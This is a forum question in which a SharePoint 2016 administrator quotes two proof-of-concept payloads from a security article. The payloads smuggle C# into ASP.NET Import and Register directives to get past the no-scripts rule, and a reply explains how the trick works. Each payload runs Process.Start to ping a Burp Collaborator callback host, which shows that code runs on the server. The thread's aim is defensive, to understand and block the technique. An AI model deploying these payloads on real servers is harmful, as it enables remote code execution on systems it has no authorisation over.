1

I am an administrator of a SharePoint 2016 environment and I came across this article. The author had investigated if there were any ways to get around the no scripts rule of a SharePoint ASP.NET environment (in web.config, script blocks are by default marked as unsafe and not allowed) and found one: They injected code into the Import & Register directives. Here are the examples of the code they used:

<%@ Page language="C#" classname="mytest_irsdl" %> 

<%@ import Namespace='System.Net;public/**/class/**/mytest_irsdl:global::System.Web.UI.Page,System.Web.SessionState.IRequiresSessionState,System.Web.IHttpHandler{public/**/static/**/object/**/@__stringResource;public/**/static/**/object/**/@__fileDependencies;public/**/static/**/bool/**/__initialized=false;object/**/test2=System.Diagnostics.Process.Start("ping","itsover.g9qrlom4l1slw29pf07k3xtoyf47sw.burpcollaborator.net");}}namespace/**/foo{using/**/System.Linq;using/**/System.Web.Security;using/**/System.Collections.Generic;using/**/System.Text.RegularExpressions;using/**/System.Web.UI.WebControls;using/**/System.Xml.Linq;using/**/System.Web.UI;using/**/System;using/**/System.Web.UI.HtmlControls;using/**/System.Web;using/**/System.Configuration;using/**/System.ComponentModel.DataAnnotations;using/**/System.Text;using/**/System.Web.Profile;using/**/System.Web.Caching;using/**/System.Collections;using/**/System.Web.UI.WebControls.WebParts;using/**/System.Web.UI.WebControls.Expressions;using/**/System.Collections.Specialized;using/**/System.Web.SessionState;using/**/System.Web.DynamicData;//' %>

Their other example:

<%@ Page language="C#" classname="mytest_irsdl" %> 
<%@ Register Tagprefix="MDSec" Namespace='System.Windows.Data;public/**/class/**/mytest_irsdl:global::System.Web.UI.Page,System.Web.SessionState.IRequiresSessionState,System.Web.IHttpHandler{public/**/static/**/object/**/@__stringResource;public/**/static/**/object/**/@__fileDependencies;public/**/static/**/bool/**/__initialized=false;object/**/test2=System.Diagnostics.Process.Start("ping","xxx.g9qrlom4l1slw29pf07k3xtoyf47sw.burpcollaborator.net");}}namespace/**/foo{using/**/System.Linq;using/**/System.Web.Security;using/**/System.Collections.Generic;using/**/System.Text.RegularExpressions;using/**/System.Web.UI.WebControls;using/**/System.Xml.Linq;using/**/System.Web.UI;using/**/System;using/**/System.Web.UI.HtmlControls;using/**/System.Web;using/**/System.Configuration;using/**/System.ComponentModel.DataAnnotations;using/**/System.Text;using/**/System.Web.Profile;using/**/System.Web.Caching;using/**/System.Collections;using/**/System.Web.UI.WebControls.WebParts;using/**/System.Web.UI.WebControls.Expressions;using/**/System.Collections.Specialized;using/**/System.Web.SessionState;using/**/System.Web.DynamicData;//' Assembly="PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35" %>

I interact much less with ASP.NET/C# so I am not sure how this code works. Can someone please explain it to me? I ask because 1.) It didn't work when I tried it (I just completely copied and pasted both of these examples, and I got no errors, but the command didn't run) and 2.) I'd like to know if there's a web.config modification or some other setting that can disable this.

4yl1n
  • 148
  • 1
  • 10
  • 2
    They are taking advantage of the way the ASP.Net translator transforms `Import` or `Register` directives to add code (like a SQL Injection attack). Basically they have replaced spaces with `/**/` comments and then closed the outside code and opened a new namespace. – NetMage Oct 19 '20 at 17:55
  • @NetMage Do you have any idea as to why the code didn't work when I tried it? Here's exactly what I did: Open a test site collection in SharePoint Designer, created a site page, added the code to it (I tried with both code examples), the only thing I changed was that it instead of pinging a website, I made it create a file on the server. I got no error when I navigated to the page in my browser, but the file was not present when I checked. – 4yl1n Oct 19 '20 at 20:54

0 Answers0